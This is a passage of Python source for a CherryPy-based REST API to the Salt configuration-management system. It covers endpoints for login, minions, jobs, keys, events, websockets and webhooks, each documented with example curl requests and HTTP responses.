# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links to where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.list_job' if jid else 'jobs.list_jobs',
'jid': jid,
}]
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns.keys():
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.moves.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.moves.StringIO(pub_key))
tarball.addfile(priv_key_file, six.moves.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
cherrypy.session['user'] = token['name']
if 'groups' in token:
cherrypy.session['groups'] = token['groups']
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
        The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
        When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
        clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
        asynchronicity into account when designing an application. Below are some
general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
        A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
        curl's ``-N`` flag turns off output buffering, which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
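        It is also possible to consume the stream from Python. The following
        is a minimal sketch (not part of Salt itself); it assumes the
        third-party ``requests`` library is installed and uses a placeholder
        token:

        .. code-block:: python

            import json
            import requests

            resp = requests.get('http://localhost:8000/events',
                                headers={'X-Auth-Token': '308650d'},
                                stream=True)
            for line in resp.iter_lines(decode_unicode=True):
                if line and line.startswith('data: '):
                    event = json.loads(line[len('data: '):])
                    print(event['tag'], event['data'])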
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
        The above examples show how to establish a websocket connection to Salt and
        activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
'''
        # Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
        This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
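    The same hook can also be fired from Python. The snippet below is an
    illustrative sketch only (not part of Salt); it assumes the third-party
    ``requests`` library is installed and uses placeholder URL and data:

    .. code-block:: python

        import requests

        requests.post(
            'https://saltapi-url.example.com:8000/hook/travis/build/success',
            data={'branch': 'master', 'commit': 'aa22a3c4b2e7'},
            verify=False,  # mirrors the -k flag in the curl example above
        )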
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
                    pillar:
                      revision: {{ build.revision }}
{% endif %}
'''
